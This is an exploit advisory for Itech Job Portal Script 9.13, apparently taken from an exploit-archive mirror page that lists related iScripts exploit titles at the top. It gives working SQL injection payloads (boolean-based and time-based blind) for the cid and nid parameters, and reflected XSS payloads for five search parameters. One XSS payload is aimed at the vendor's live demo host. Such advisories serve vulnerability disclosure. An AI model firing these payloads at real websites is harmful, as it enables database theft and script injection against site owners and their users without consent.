565aa68240
4 new exploits iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities iScripts EasyCreate 2.0 - Multiple Vulnerabilities iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal iScripts AutoHoster - 'checktransferstatus.php' SQL Injection iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection iScripts AutoHoster - 'additionalsettings.php' SQL Injection iScripts AutoHoster - 'invno' Parameter SQL Injection iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal Job Portal Script 9.11 - Authentication Bypass Itech Job Portal Script 9.11 - Authentication Bypass Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection Itech Job Portal Script 9.13 - Multiple Vulnerabilities iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection
66 lines
2.2 KiB
Text
Executable file
66 lines
2.2 KiB
Text
Executable file
# Exploit Title : Itech Job Portal Script - Multiple Vulnerabilities
|
|
# Author : Yunus YILDIRIM (Th3GundY)
|
|
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
|
|
# Website : http://www.yunus.ninja
|
|
# Contact : yunusyildirim@protonmail.com
|
|
|
|
# Vendor Homepage : http://itechscripts.com/
|
|
# Software Link : http://itechscripts.com/job-portal-script/
|
|
# Vuln. Version : 9.13
|
|
# Demo : http://job-portal.itechscripts.com/
|
|
|
|
|
|
# # # # DETAILS # # # #
|
|
|
|
SQL Injections :
|
|
|
|
# 1
|
|
http://localhost/career_advice_details.php?cid=5
|
|
Parameter: cid (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: cid=5' AND 7504=7504-- zpmu
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 OR time-based blind (comment)
|
|
Payload: cid=5' OR SLEEP(5)#
|
|
|
|
# 2
|
|
http://localhost/news_details_us.php?nid=1
|
|
Parameter: nid (GET)
|
|
Type: boolean-based blind
|
|
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
|
Payload: nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 OR time-based blind
|
|
Payload: nid=1' OR SLEEP(5)-- UoUN
|
|
|
|
# # # # # # # # # # # # # # # # # # # # # # # #
|
|
|
|
Cross site scriptings (XSS) :
|
|
|
|
# 1
|
|
http://localhost/search_result_alluser.php?function="><svg/onload=prompt('CT-Zer0');>
|
|
Parameter: function (GET)
|
|
Payload: "><svg/onload=prompt('CT-Zer0');>
|
|
|
|
# 2
|
|
http://localhost/search_result_alluser.php?ind="><svg/onload=prompt('CT-Zer0');>
|
|
Parameter: ind (GET)
|
|
Payload: "><svg/onload=prompt('CT-Zer0');>
|
|
|
|
# 3
|
|
http://localhost/search_result_alluser.php?loc="><svg/onload=prompt('CT-Zer0');>
|
|
Parameter: loc (GET)
|
|
Payload: "><svg/onload=prompt('CT-Zer0');>
|
|
|
|
# 4
|
|
http://localhost/search_result_alluser.php?compid="><svg/onload=prompt('CT-Zer0');>
|
|
Parameter: compid (GET)
|
|
Payload: "><svg/onload=prompt('CT-Zer0');>
|
|
|
|
# 5
|
|
http://job-portal.itechscripts.com/search_result_alluser.php?days_chk="><svg/onload=prompt('CT-Zer0');>
|
|
Parameter: days_chk (GET)
|
|
Payload: "><svg/onload=prompt('CT-Zer0');>
|